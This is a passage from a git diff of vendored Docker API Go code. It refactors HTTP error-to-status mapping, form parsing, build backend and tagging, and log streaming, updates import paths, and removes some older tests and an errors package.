-					PrivatePort: 1024,
-					Type:        "udp",
-				}, {
-					IP:          "2.1.1.1",
-					PublicPort:  1024,
-					PrivatePort: 80,
-					Type:        "tcp",
-				}, {
-					IP:          "2.1.1.1",
-					PublicPort:  1024,
-					PrivatePort: 80,
-					Type:        "udp",
-				},
-			},
-			"80/tcp, 80/udp, 1024/tcp, 1024/udp, 1.1.1.1:1024->80/tcp, 1.1.1.1:1024->80/udp, 2.1.1.1:1024->80/tcp, 2.1.1.1:1024->80/udp, 1.1.1.1:80->1024/tcp, 1.1.1.1:80->1024/udp, 2.1.1.1:80->1024/tcp, 2.1.1.1:80->1024/udp",
-		},
-	}
-
-	for _, port := range cases {
-		actual := DisplayablePorts(port.ports)
-		if port.expected != actual {
-			t.Fatalf("Expected %s, got %s.", port.expected, actual)
-		}
-	}
-}
-
-// MatchesContentType
-func TestJsonContentType(t *testing.T) {
-	if !MatchesContentType("application/json", "application/json") {
-		t.Fail()
-	}
-
-	if !MatchesContentType("application/json; charset=utf-8", "application/json") {
-		t.Fail()
-	}
-
-	if MatchesContentType("dockerapplication/json", "application/json") {
-		t.Fail()
-	}
-}
-
-// LoadOrCreateTrustKey
-func TestLoadOrCreateTrustKeyInvalidKeyFile(t *testing.T) {
-	tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpKeyFolderPath)
-
-	tmpKeyFile, err := ioutil.TempFile(tmpKeyFolderPath, "keyfile")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := LoadOrCreateTrustKey(tmpKeyFile.Name()); err == nil {
-		t.Fatalf("expected an error, got nothing.")
-	}
-
-}
-
-func TestLoadOrCreateTrustKeyCreateKey(t *testing.T) {
-	tmpKeyFolderPath, err := ioutil.TempDir("", "api-trustkey-test")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmpKeyFolderPath)
-
-	// Without the need to create the folder hierarchy
-	tmpKeyFile := filepath.Join(tmpKeyFolderPath, "keyfile")
-
-	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
-		t.Fatalf("expected a new key file, got : %v and %v", err, key)
-	}
-
-	if _, err := os.Stat(tmpKeyFile); err != nil {
-		t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err)
-	}
-
-	// With the need to create the folder hierarchy as tmpKeyFie is in a path
-	// where some folders do not exist.
-	tmpKeyFile = filepath.Join(tmpKeyFolderPath, "folder/hierarchy/keyfile")
-
-	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
-		t.Fatalf("expected a new key file, got : %v and %v", err, key)
-	}
-
-	if _, err := os.Stat(tmpKeyFile); err != nil {
-		t.Fatalf("Expected to find a file %s, got %v", tmpKeyFile, err)
-	}
-
-	// With no path at all
-	defer os.Remove("keyfile")
-	if key, err := LoadOrCreateTrustKey("keyfile"); err != nil || key == nil {
-		t.Fatalf("expected a new key file, got : %v and %v", err, key)
-	}
-
-	if _, err := os.Stat("keyfile"); err != nil {
-		t.Fatalf("Expected to find a file keyfile, got %v", err)
-	}
-}
-
-func TestLoadOrCreateTrustKeyLoadValidKey(t *testing.T) {
-	tmpKeyFile := filepath.Join("fixtures", "keyfile")
-
-	if key, err := LoadOrCreateTrustKey(tmpKeyFile); err != nil || key == nil {
-		t.Fatalf("expected a key file, got : %v and %v", err, key)
-	}
-}
diff --git a/vendor/github.com/docker/docker/api/common_unix.go b/vendor/github.com/docker/docker/api/common_unix.go
index 081e61c451..504b0c90d7 100644
--- a/vendor/github.com/docker/docker/api/common_unix.go
+++ b/vendor/github.com/docker/docker/api/common_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package api
+package api // import "github.com/docker/docker/api"
 
 // MinVersion represents Minimum REST API version supported
-const MinVersion string = "1.12"
+const MinVersion = "1.12"
diff --git a/vendor/github.com/docker/docker/api/common_windows.go b/vendor/github.com/docker/docker/api/common_windows.go
index d930fa0720..590ba5479b 100644
--- a/vendor/github.com/docker/docker/api/common_windows.go
+++ b/vendor/github.com/docker/docker/api/common_windows.go
@@ -1,8 +1,8 @@
-package api
+package api // import "github.com/docker/docker/api"
 
 // MinVersion represents Minimum REST API version supported
 // Technically the first daemon API version released on Windows is v1.25 in
 // engine version 1.13. However, some clients are explicitly using downlevel
-// APIs (eg docker-compose v2.1 file format) and that is just too restrictive.
+// APIs (e.g. docker-compose v2.1 file format) and that is just too restrictive.
 // Hence also allowing 1.24 on Windows.
 const MinVersion string = "1.24"
diff --git a/vendor/github.com/docker/docker/api/errors/errors.go b/vendor/github.com/docker/docker/api/errors/errors.go
deleted file mode 100644
index 29fd2545dc..0000000000
--- a/vendor/github.com/docker/docker/api/errors/errors.go
+++ /dev/null
@@ -1,47 +0,0 @@
-package errors
-
-import "net/http"
-
-// apiError is an error wrapper that also
-// holds information about response status codes.
-type apiError struct {
-	error
-	statusCode int
-}
-
-// HTTPErrorStatusCode returns a status code.
-func (e apiError) HTTPErrorStatusCode() int {
-	return e.statusCode
-}
-
-// NewErrorWithStatusCode allows you to associate
-// a specific HTTP Status Code to an error.
-// The Server will take that code and set
-// it as the response status.
-func NewErrorWithStatusCode(err error, code int) error {
-	return apiError{err, code}
-}
-
-// NewBadRequestError creates a new API error
-// that has the 400 HTTP status code associated to it.
-func NewBadRequestError(err error) error {
-	return NewErrorWithStatusCode(err, http.StatusBadRequest)
-}
-
-// NewRequestForbiddenError creates a new API error
-// that has the 403 HTTP status code associated to it.
-func NewRequestForbiddenError(err error) error {
-	return NewErrorWithStatusCode(err, http.StatusForbidden)
-}
-
-// NewRequestNotFoundError creates a new API error
-// that has the 404 HTTP status code associated to it.
-func NewRequestNotFoundError(err error) error {
-	return NewErrorWithStatusCode(err, http.StatusNotFound)
-}
-
-// NewRequestConflictError creates a new API error
-// that has the 409 HTTP status code associated to it.
-func NewRequestConflictError(err error) error {
-	return NewErrorWithStatusCode(err, http.StatusConflict)
-}
diff --git a/vendor/github.com/docker/docker/api/server/backend/build/backend.go b/vendor/github.com/docker/docker/api/server/backend/build/backend.go
new file mode 100644
index 0000000000..546ad5f86d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/backend/build/backend.go
@@ -0,0 +1,136 @@
+package build // import "github.com/docker/docker/api/server/backend/build"
+
+import (
+	"context"
+	"fmt"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/builder"
+	buildkit "github.com/docker/docker/builder/builder-next"
+	"github.com/docker/docker/builder/fscache"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/pkg/errors"
+	"golang.org/x/sync/errgroup"
+)
+
+// ImageComponent provides an interface for working with images
+type ImageComponent interface {
+	SquashImage(from string, to string) (string, error)
+	TagImageWithReference(image.ID, reference.Named) error
+}
+
+// Builder defines interface for running a build
+type Builder interface {
+	Build(context.Context, backend.BuildConfig) (*builder.Result, error)
+}
+
+// Backend provides build functionality to the API router
+type Backend struct {
+	builder        Builder
+	fsCache        *fscache.FSCache
+	imageComponent ImageComponent
+	buildkit       *buildkit.Builder
+}
+
+// NewBackend creates a new build backend from components
+func NewBackend(components ImageComponent, builder Builder, fsCache *fscache.FSCache, buildkit *buildkit.Builder) (*Backend, error) {
+	return &Backend{imageComponent: components, builder: builder, fsCache: fsCache, buildkit: buildkit}, nil
+}
+
+// Build builds an image from a Source
+func (b *Backend) Build(ctx context.Context, config backend.BuildConfig) (string, error) {
+	options := config.Options
+	useBuildKit := options.Version == types.BuilderBuildKit
+
+	tagger, err := NewTagger(b.imageComponent, config.ProgressWriter.StdoutFormatter, options.Tags)
+	if err != nil {
+		return "", err
+	}
+
+	var build *builder.Result
+	if useBuildKit {
+		build, err = b.buildkit.Build(ctx, config)
+		if err != nil {
+			return "", err
+		}
+	} else {
+		build, err = b.builder.Build(ctx, config)
+		if err != nil {
+			return "", err
+		}
+	}
+
+	if build == nil {
+		return "", nil
+	}
+
+	var imageID = build.ImageID
+	if options.Squash {
+		if imageID, err = squashBuild(build, b.imageComponent); err != nil {
+			return "", err
+		}
+		if config.ProgressWriter.AuxFormatter != nil {
+			if err = config.ProgressWriter.AuxFormatter.Emit(types.BuildResult{ID: imageID}); err != nil {
+				return "", err
+			}
+		}
+	}
+
+	if !useBuildKit {
+		stdout := config.ProgressWriter.StdoutFormatter
+		fmt.Fprintf(stdout, "Successfully built %s\n", stringid.TruncateID(imageID))
+		err = tagger.TagImages(image.ID(imageID))
+	}
+	return imageID, err
+}
+
+// PruneCache removes all cached build sources
+func (b *Backend) PruneCache(ctx context.Context) (*types.BuildCachePruneReport, error) {
+	eg, ctx := errgroup.WithContext(ctx)
+
+	var fsCacheSize uint64
+	eg.Go(func() error {
+		var err error
+		fsCacheSize, err = b.fsCache.Prune(ctx)
+		if err != nil {
+			return errors.Wrap(err, "failed to prune fscache")
+		}
+		return nil
+	})
+
+	var buildCacheSize int64
+	eg.Go(func() error {
+		var err error
+		buildCacheSize, err = b.buildkit.Prune(ctx)
+		if err != nil {
+			return errors.Wrap(err, "failed to prune build cache")
+		}
+		return nil
+	})
+
+	if err := eg.Wait(); err != nil {
+		return nil, err
+	}
+
+	return &types.BuildCachePruneReport{SpaceReclaimed: fsCacheSize + uint64(buildCacheSize)}, nil
+}
+
+// Cancel cancels the build by ID
+func (b *Backend) Cancel(ctx context.Context, id string) error {
+	return b.buildkit.Cancel(ctx, id)
+}
+
+func squashBuild(build *builder.Result, imageComponent ImageComponent) (string, error) {
+	var fromID string
+	if build.FromImage != nil {
+		fromID = build.FromImage.ImageID()
+	}
+	imageID, err := imageComponent.SquashImage(build.ImageID, fromID)
+	if err != nil {
+		return "", errors.Wrap(err, "error squashing image")
+	}
+	return imageID, nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/backend/build/tag.go b/vendor/github.com/docker/docker/api/server/backend/build/tag.go
new file mode 100644
index 0000000000..f840b9d726
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/backend/build/tag.go
@@ -0,0 +1,77 @@
+package build // import "github.com/docker/docker/api/server/backend/build"
+
+import (
+	"fmt"
+	"io"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/image"
+	"github.com/pkg/errors"
+)
+
+// Tagger is responsible for tagging an image created by a builder
+type Tagger struct {
+	imageComponent ImageComponent
+	stdout         io.Writer
+	repoAndTags    []reference.Named
+}
+
+// NewTagger returns a new Tagger for tagging the images of a build.
+// If any of the names are invalid tags an error is returned.
+func NewTagger(backend ImageComponent, stdout io.Writer, names []string) (*Tagger, error) {
+	reposAndTags, err := sanitizeRepoAndTags(names)
+	if err != nil {
+		return nil, err
+	}
+	return &Tagger{
+		imageComponent: backend,
+		stdout:         stdout,
+		repoAndTags:    reposAndTags,
+	}, nil
+}
+
+// TagImages creates image tags for the imageID
+func (bt *Tagger) TagImages(imageID image.ID) error {
+	for _, rt := range bt.repoAndTags {
+		if err := bt.imageComponent.TagImageWithReference(imageID, rt); err != nil {
+			return err
+		}
+		fmt.Fprintf(bt.stdout, "Successfully tagged %s\n", reference.FamiliarString(rt))
+	}
+	return nil
+}
+
+// sanitizeRepoAndTags parses the raw "t" parameter received from the client
+// to a slice of repoAndTag.
+// It also validates each repoName and tag.
+func sanitizeRepoAndTags(names []string) ([]reference.Named, error) {
+	var (
+		repoAndTags []reference.Named
+		// This map is used for deduplicating the "-t" parameter.
+		uniqNames = make(map[string]struct{})
+	)
+	for _, repo := range names {
+		if repo == "" {
+			continue
+		}
+
+		ref, err := reference.ParseNormalizedNamed(repo)
+		if err != nil {
+			return nil, err
+		}
+
+		if _, isCanonical := ref.(reference.Canonical); isCanonical {
+			return nil, errors.New("build tag cannot contain a digest")
+		}
+
+		ref = reference.TagNameOnly(ref)
+
+		nameWithTag := ref.String()
+
+		if _, exists := uniqNames[nameWithTag]; !exists {
+			uniqNames[nameWithTag] = struct{}{}
+			repoAndTags = append(repoAndTags, ref)
+		}
+	}
+	return repoAndTags, nil
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/decoder.go b/vendor/github.com/docker/docker/api/server/httputils/decoder.go
index 458eac5600..8293503c48 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/decoder.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/decoder.go
@@ -1,4 +1,4 @@
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/api/server/httputils/errors.go b/vendor/github.com/docker/docker/api/server/httputils/errors.go
index 59098a9df0..a21affff34 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/errors.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/errors.go
@@ -1,34 +1,23 @@
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
+	"fmt"
 	"net/http"
-	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/errdefs"
 	"github.com/gorilla/mux"
+	"github.com/sirupsen/logrus"
 	"google.golang.org/grpc"
+	"google.golang.org/grpc/codes"
 )
 
-// httpStatusError is an interface
-// that errors with custom status codes
-// implement to tell the api layer
-// which response status to set.
-type httpStatusError interface {
-	HTTPErrorStatusCode() int
+type causer interface {
+	Cause() error
 }
 
-// inputValidationError is an interface
-// that errors generated by invalid
-// inputs can implement to tell the
-// api layer to set a 400 status code
-// in the response.
-type inputValidationError interface {
-	IsValidationError() bool
-}
-
-// GetHTTPErrorStatusCode retrieves status code from error message
+// GetHTTPErrorStatusCode retrieves status code from error message.
 func GetHTTPErrorStatusCode(err error) int {
 	if err == nil {
 		logrus.WithFields(logrus.Fields{"error": err}).Error("unexpected HTTP error handling")
@@ -36,39 +25,44 @@ func GetHTTPErrorStatusCode(err error) int {
 	}
 
 	var statusCode int
-	errMsg := err.Error()
 
-	switch e := err.(type) {
-	case httpStatusError:
-		statusCode = e.HTTPErrorStatusCode()
-	case inputValidationError:
+	// Stop right there
+	// Are you sure you should be adding a new error class here? Do one of the existing ones work?
+
+	// Note that the below functions are already checking the error causal chain for matches.
+	switch {
+	case errdefs.IsNotFound(err):
+		statusCode = http.StatusNotFound
+	case errdefs.IsInvalidParameter(err):
 		statusCode = http.StatusBadRequest
+	case errdefs.IsConflict(err) || errdefs.IsAlreadyExists(err):
+		statusCode = http.StatusConflict
+	case errdefs.IsUnauthorized(err):
+		statusCode = http.StatusUnauthorized
+	case errdefs.IsUnavailable(err):
+		statusCode = http.StatusServiceUnavailable
+	case errdefs.IsForbidden(err):
+		statusCode = http.StatusForbidden
+	case errdefs.IsNotModified(err):
+		statusCode = http.StatusNotModified
+	case errdefs.IsNotImplemented(err):
+		statusCode = http.StatusNotImplemented
+	case errdefs.IsSystem(err) || errdefs.IsUnknown(err) || errdefs.IsDataLoss(err) || errdefs.IsDeadline(err) || errdefs.IsCancelled(err):
+		statusCode = http.StatusInternalServerError
 	default:
-		// FIXME: this is brittle and should not be necessary, but we still need to identify if
-		// there are errors falling back into this logic.
-		// If we need to differentiate between different possible error types,
-		// we should create appropriate error types that implement the httpStatusError interface.
-		errStr := strings.ToLower(errMsg)
-		for _, status := range []struct {
-			keyword string
-			code    int
-		}{
-			{"not found", http.StatusNotFound},
-			{"no such", http.StatusNotFound},
-			{"bad parameter", http.StatusBadRequest},
-			{"no command", http.StatusBadRequest},
-			{"conflict", http.StatusConflict},
-			{"impossible", http.StatusNotAcceptable},
-			{"wrong login/password", http.StatusUnauthorized},
-			{"unauthorized", http.StatusUnauthorized},
-			{"hasn't been activated", http.StatusForbidden},
-			{"this node", http.StatusServiceUnavailable},
-		} {
-			if strings.Contains(errStr, status.keyword) {
-				statusCode = status.code
-				break
-			}
+		statusCode = statusCodeFromGRPCError(err)
+		if statusCode != http.StatusInternalServerError {
+			return statusCode
+		}
+
+		if e, ok := err.(causer); ok {
+			return GetHTTPErrorStatusCode(e.Cause())
 		}
+
+		logrus.WithFields(logrus.Fields{
+			"module":     "api",
+			"error_type": fmt.Sprintf("%T", err),
+		}).Debugf("FIXME: Got an API for which error does not match any expected type!!!: %+v", err)
 	}
 
 	if statusCode == 0 {
@@ -99,3 +93,39 @@ func MakeErrorHandler(err error) http.HandlerFunc {
 		}
 	}
 }
+
+// statusCodeFromGRPCError returns status code according to gRPC error
+func statusCodeFromGRPCError(err error) int {
+	switch grpc.Code(err) {
+	case codes.InvalidArgument: // code 3
+		return http.StatusBadRequest
+	case codes.NotFound: // code 5
+		return http.StatusNotFound
+	case codes.AlreadyExists: // code 6
+		return http.StatusConflict
+	case codes.PermissionDenied: // code 7
+		return http.StatusForbidden
+	case codes.FailedPrecondition: // code 9
+		return http.StatusBadRequest
+	case codes.Unauthenticated: // code 16
+		return http.StatusUnauthorized
+	case codes.OutOfRange: // code 11
+		return http.StatusBadRequest
+	case codes.Unimplemented: // code 12
+		return http.StatusNotImplemented
+	case codes.Unavailable: // code 14
+		return http.StatusServiceUnavailable
+	default:
+		if e, ok := err.(causer); ok {
+			return statusCodeFromGRPCError(e.Cause())
+		}
+		// codes.Canceled(1)
+		// codes.Unknown(2)
+		// codes.DeadlineExceeded(4)
+		// codes.ResourceExhausted(8)
+		// codes.Aborted(10)
+		// codes.Internal(13)
+		// codes.DataLoss(15)
+		return http.StatusInternalServerError
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/form.go b/vendor/github.com/docker/docker/api/server/httputils/form.go
index 20188c12d8..6d166eac10 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/form.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/form.go
@@ -1,9 +1,7 @@
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
-	"fmt"
 	"net/http"
-	"path/filepath"
 	"strconv"
 	"strings"
 )
@@ -15,7 +13,7 @@ func BoolValue(r *http.Request, k string) bool {
 }
 
 // BoolValueOrDefault returns the default bool passed if the query param is
-// missing, otherwise it's just a proxy to boolValue above
+// missing, otherwise it's just a proxy to boolValue above.
 func BoolValueOrDefault(r *http.Request, k string, d bool) bool {
 	if _, ok := r.Form[k]; !ok {
 		return d
@@ -38,10 +36,7 @@ func Int64ValueOrZero(r *http.Request, k string) int64 {
 func Int64ValueOrDefault(r *http.Request, field string, def int64) (int64, error) {
 	if r.Form.Get(field) != "" {
 		value, err := strconv.ParseInt(r.Form.Get(field), 10, 64)
-		if err != nil {
-			return value, err
-		}
-		return value, nil
+		return value, err
 	}
 	return def, nil
 }
@@ -52,6 +47,16 @@ type ArchiveOptions struct {
 	Path string
 }
 
+type badParameterError struct {
+	param string
+}
+
+func (e badParameterError) Error() string {
+	return "bad parameter: " + e.param + "cannot be empty"
+}
+
+func (e badParameterError) InvalidParameter() {}
+
 // ArchiveFormValues parses form values and turns them into ArchiveOptions.
 // It fails if the archive name and path are not in the request.
 func ArchiveFormValues(r *http.Request, vars map[string]string) (ArchiveOptions, error) {
@@ -60,14 +65,12 @@ func ArchiveFormValues(r *http.Request, vars map[string]string) (ArchiveOptions,
 	}
 
 	name := vars["name"]
-	path := filepath.FromSlash(r.Form.Get("path"))
-
-	switch {
-	case name == "":
-		return ArchiveOptions{}, fmt.Errorf("bad parameter: 'name' cannot be empty")
-	case path == "":
-		return ArchiveOptions{}, fmt.Errorf("bad parameter: 'path' cannot be empty")
+	if name == "" {
+		return ArchiveOptions{}, badParameterError{"name"}
+	}
+	path := r.Form.Get("path")
+	if path == "" {
+		return ArchiveOptions{}, badParameterError{"path"}
 	}
-
 	return ArchiveOptions{name, path}, nil
 }
diff --git a/vendor/github.com/docker/docker/api/server/httputils/form_test.go b/vendor/github.com/docker/docker/api/server/httputils/form_test.go
index c56f7c15e3..e7e2daea20 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/form_test.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/form_test.go
@@ -1,4 +1,4 @@
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
 	"net/http"
@@ -100,6 +100,6 @@ func TestInt64ValueOrDefaultWithError(t *testing.T) {
 
 	_, err := Int64ValueOrDefault(r, "test", -1)
 	if err == nil {
-		t.Fatalf("Expected an error.")
+		t.Fatal("Expected an error.")
 	}
 }
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils.go b/vendor/github.com/docker/docker/api/server/httputils/httputils.go
index 7930ff7a07..5a6854415c 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/httputils.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils.go
@@ -1,21 +1,21 @@
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
-	"fmt"
+	"context"
 	"io"
+	"mime"
 	"net/http"
 	"strings"
 
-	"golang.org/x/net/context"
-
-	"github.com/docker/docker/api"
+	"github.com/docker/docker/errdefs"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
-// APIVersionKey is the client's requested API version.
-const APIVersionKey = "api-version"
+type contextKey string
 
-// UAStringKey is used as key type for user-agent string in net/context struct
-const UAStringKey = "upstream-user-agent"
+// APIVersionKey is the client's requested API version.
+const APIVersionKey contextKey = "api-version"
 
 // APIFunc is an adapter to allow the use of ordinary functions as Docker API endpoints.
 // Any function that has the appropriate signature can be registered as an API endpoint (e.g. getVersion).
@@ -58,10 +58,10 @@ func CheckForJSON(r *http.Request) error {
 	}
 
 	// Otherwise it better be json
-	if api.MatchesContentType(ct, "application/json") {
+	if matchesContentType(ct, "application/json") {
 		return nil
 	}
-	return fmt.Errorf("Content-Type specified (%s) must be 'application/json'", ct)
+	return errdefs.InvalidParameter(errors.Errorf("Content-Type specified (%s) must be 'application/json'", ct))
 }
 
 // ParseForm ensures the request form is parsed even with invalid content types.
@@ -71,20 +71,30 @@ func ParseForm(r *http.Request) error {
 		return nil
 	}
 	if err := r.ParseForm(); err != nil && !strings.HasPrefix(err.Error(), "mime:") {
-		return err
+		return errdefs.InvalidParameter(err)
 	}
 	return nil
 }
 
 // VersionFromContext returns an API version from the context using APIVersionKey.
 // It panics if the context value does not have version.Version type.
-func VersionFromContext(ctx context.Context) (ver string) {
+func VersionFromContext(ctx context.Context) string {
 	if ctx == nil {
-		return
+		return ""
+	}
+
+	if val := ctx.Value(APIVersionKey); val != nil {
+		return val.(string)
 	}
-	val := ctx.Value(APIVersionKey)
-	if val == nil {
-		return
+
+	return ""
+}
+
+// matchesContentType validates the content type against the expected one
+func matchesContentType(contentType, expectedType string) bool {
+	mimetype, _, err := mime.ParseMediaType(contentType)
+	if err != nil {
+		logrus.Errorf("Error parsing media type: %s error: %v", contentType, err)
 	}
-	return val.(string)
+	return err == nil && mimetype == expectedType
 }
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_test.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_test.go
new file mode 100644
index 0000000000..97f83188d1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_test.go
@@ -0,0 +1,18 @@
+package httputils // import "github.com/docker/docker/api/server/httputils"
+
+import "testing"
+
+// matchesContentType
+func TestJsonContentType(t *testing.T) {
+	if !matchesContentType("application/json", "application/json") {
+		t.Fail()
+	}
+
+	if !matchesContentType("application/json; charset=utf-8", "application/json") {
+		t.Fail()
+	}
+
+	if matchesContentType("dockerapplication/json", "application/json") {
+		t.Fail()
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
index 4787cc3c33..148dd038b3 100644
--- a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
+++ b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json.go
@@ -1,6 +1,4 @@
-// +build go1.7
-
-package httputils
+package httputils // import "github.com/docker/docker/api/server/httputils"
 
 import (
 	"encoding/json"
diff --git a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go b/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
deleted file mode 100644
index bdc6981738..0000000000
--- a/vendor/github.com/docker/docker/api/server/httputils/httputils_write_json_go16.go
+++ /dev/null
@@ -1,16 +0,0 @@
-// +build go1.6,!go1.7
-
-package httputils
-
-import (
-	"encoding/json"
-	"net/http"
-)
-
-// WriteJSON writes the value v to the http response stream as json with standard json encoding.
-func WriteJSON(w http.ResponseWriter, code int, v interface{}) error {
-	w.Header().Set("Content-Type", "application/json")
-	w.WriteHeader(code)
-	enc := json.NewEncoder(w)
-	return enc.Encode(v)
-}
diff --git a/vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go b/vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go
new file mode 100644
index 0000000000..9e769c8b4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/server/httputils/write_log_stream.go
@@ -0,0 +1,84 @@
+package httputils // import "github.com/docker/docker/api/server/httputils"
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"net/url"
+	"sort"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/backend"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/stdcopy"
+)
+
+// WriteLogStream writes an encoded byte stream of log messages from the
+// messages channel, multiplexing them with a stdcopy.Writer if mux is true
+func WriteLogStream(_ context.Context, w io.Writer, msgs <-chan *backend.LogMessage, config *types.ContainerLogsOptions, mux bool) {
+	wf := ioutils.NewWriteFlusher(w)
+	defer wf.Close()
+
+	wf.Flush()
+
+	outStream := io.Writer(wf)
+	errStream := outStream
+	sysErrStream := errStream
+	if mux {
+		sysErrStream = stdcopy.NewStdWriter(outStream, stdcopy.Systemerr)
+		errStream = stdcopy.NewStdWriter(outStream, stdcopy.Stderr)
+		outStream = stdcopy.NewStdWriter(outStream, stdcopy.Stdout)
+	}
+
+	for {
+		msg, ok := <-msgs
+		if !ok {
+			return
+		}
+		// check if the message contains an error. if so, write that error
+		// and exit
+		if msg.Err != nil {
+			fmt.Fprintf(sysErrStream, "Error grabbing logs: %v\n", msg.Err)
+			continue
+		}
+		logLine := msg.Line
+		if config.Details {
+			logLine = append(attrsByteSlice(msg.Attrs), ' ')
+			logLine = append(logLine, msg.Line...)
+		}
+		if config.Timestamps {
+			logLine = append([]byte(msg.Timestamp.Format(jsonmessage.RFC3339NanoFixed)+" "), logLine...)
+		}
+		if msg.Source == "stdout" && config.ShowStdout {
+			outStream.Write(logLine)
+		}
+		if msg.Source == "stderr" && config.ShowStderr {
+			errStream.Write(logLine)
+		}
+	}
+}
+
+type byKey []backend.LogAttr
+
+func (b byKey) Len() int           { return len(b) }
+func (b byKey) Less(i, j int) bool { return b[i].Key < b[j].Key }
+func (b byKey) Swap(i, j int)      { b[i], b[j] = b[j], b[i] }
+
+func attrsByteSlice(a []backend.LogAttr) []byte {
+	// Note this sorts "a" in-place. That is fine here - nothing else is
+	// going to use Attrs or care about the order.
+	sort.Sort(byKey(a))
+
+	var ret []byte
+	for i, pair := range a {
+		k, v := url.QueryEscape(pair.Key), url.QueryEscape(pair.Value)
+		ret = append(ret, []byte(k)...)
+		ret = append(ret, '=')
+		ret = append(ret, []byte(v)...)
+		if i != len(a)-1 {
+			ret = append(ret, ',')
+		}
+	}
+	return ret
+}
diff --git a/vendor/github.com/docker/docker/api/server/middleware.go b/vendor/github.com/docker/docker/api/server/middleware.go
index 537ce8028f..3c5683fad9 100644
--- a/vendor/github.com/docker/docker/api/server/middleware.go
+++ b/vendor/github.com/docker/docker/api/server/middleware.go
@@ -1,9 +1,9 @@
-package server
+package server // import "github.com/docker/docker/api/server"
 
 import (
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/api/server/middleware"
+	"github.com/sirupsen/logrus"
 )
 
 // handlerWithGlobalMiddlewares wraps the handler function for a request with
diff --git a/vendor/github.com/docker/docker/api/server/middleware/cors.go b/vendor/github.com/docker/docker/api/server/middleware/cors.go
index ea725dbc72..54374690e6 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/cors.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/cors.go
@@ -1,10 +1,10 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
+	"context"
 	"net/http"
 
-	"github.com/Sirupsen/logrus"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 // CORSMiddleware injects CORS headers to each request
diff --git a/vendor/github.com/docker/docker/api/server/middleware/debug.go b/vendor/github.com/docker/docker/api/server/middleware/debug.go
index 8c8567669b..2cef1d46c3 100644
--- a/vendor/github.com/docker/docker/api/server/middleware/debug.go
+++ b/vendor/github.com/docker/docker/api/server/middleware/debug.go
@@ -1,16 +1,16 @@
-package middleware
+package middleware // import "github.com/docker/docker/api/server/middleware"
 
 import (
 	"bufio"
+	"context"
 	"encoding/json"
 	"io"
 	"net/http"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/api/server/httputils"
 	"github.com/docker/docker/pkg/ioutils"
-	"golang.org/x/net/context"
+	"github.com/sirupsen/logrus"
 )
 
 // DebugRequestMiddleware dumps the request to logger
@@ -41,7 +41,7 @@ func DebugRequestMiddleware(handler func(ctx context.Context, w http.ResponseWri
 
 		var postForm map[string]interface{}
 		if err := json.Unmarshal(b, &postForm); err == nil {
-			maskSecretKeys(postForm)
+			maskSecretKeys(postForm, r.RequestURI)
 			formStr, errMarshal := json.Marshal(postForm)
 			if errMarshal == nil {
 				logrus.Debugf("form data: %s", string(formStr))
